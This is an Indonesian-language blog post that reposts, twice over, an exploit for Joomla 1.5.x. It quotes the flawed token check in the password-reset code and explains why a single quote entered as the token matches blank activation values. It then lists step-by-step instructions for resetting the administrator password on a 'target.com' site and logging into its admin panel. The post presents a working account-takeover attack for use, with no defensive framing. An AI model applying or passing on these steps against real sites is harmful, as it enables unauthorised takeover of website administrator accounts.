Arsyad-Cyber
######################################################################################### Joomla 1.5.x Remote Admin Password Change ########################################################################################## ## # ### ######################################################################################
File : /components/com_user/controller.php
#####################################################################################Line : 379-399
function confirmreset(){// Check for request forgeriesJRequest::checkToken() or die( 'Invalid Token' );
// Get the input$token = JRequest::getVar('token', null, 'post', 'alnum'); < --- {1}
// Get the model$model = &$this->getModel('Reset');
// Verify the tokenif ($model->confirmReset($token) === false) < --- {2}{$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);return false;}
$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');}
#####################################################################################
File : /components/com_user/models/reset.php
Line: 111-130
function confirmReset($token){global $mainframe;
$db = &JFactory::getDBO();$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); < ---- {3}
// Verify the tokenif (!($id = $db->loadResult())){$this->setError(JText::_('INVALID_TOKEN'));return false;}
// Push the token and user id into the session$mainframe->setUserState($this->_namespace.'token', $token);$mainframe->setUserState($this->_namespace.'id', $id);
return true;}#####################################################################################
{1} - Replace ' with empty char{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 ANDactivation = '' "
Contoh :
1. Pergi Ke url : target.com/index.php?option=com_user&view=reset&layout=confirm
2. Tuliskan "token" char ' Dan klik OK.
3. Tulis password baru untuk admin
4. Pergi ke halaman admin CMS Joomla : target.com/administrator/
5. Login dengan password yang tadi agan masukan
######################################################################################### Joomla 1.5.x Remote Admin Password Change ########################################################################################## ## # ### ######################################################################################
File : /components/com_user/controller.php
#####################################################################################Line : 379-399
function confirmreset(){// Check for request forgeriesJRequest::checkToken() or die( 'Invalid Token' );
// Get the input$token = JRequest::getVar('token', null, 'post', 'alnum'); < --- {1}
// Get the model$model = &$this->getModel('Reset');
// Verify the tokenif ($model->confirmReset($token) === false) < --- {2}{$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);return false;}
$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');}
#####################################################################################
File : /components/com_user/models/reset.php
Line: 111-130
function confirmReset($token){global $mainframe;
$db = &JFactory::getDBO();$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token)); < ---- {3}
// Verify the tokenif (!($id = $db->loadResult())){$this->setError(JText::_('INVALID_TOKEN'));return false;}
// Push the token and user id into the session$mainframe->setUserState($this->_namespace.'token', $token);$mainframe->setUserState($this->_namespace.'id', $id);
return true;}#####################################################################################
{1} - Replace ' with empty char{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 ANDactivation = '' "
Contoh :
1. Pergi Ke url : target.com/index.php?option=com_user&view=reset&layout=confirm
2. Tuliskan "token" char ' Dan klik OK.
3. Tulis password baru untuk admin
4. Pergi ke halaman admin CMS Joomla : target.com/administrator/
5. Login dengan password yang tadi agan masukan
Hargai karya orang lain dengan memasang sumber setelah mengcopy
0 komentar:
Posting Komentar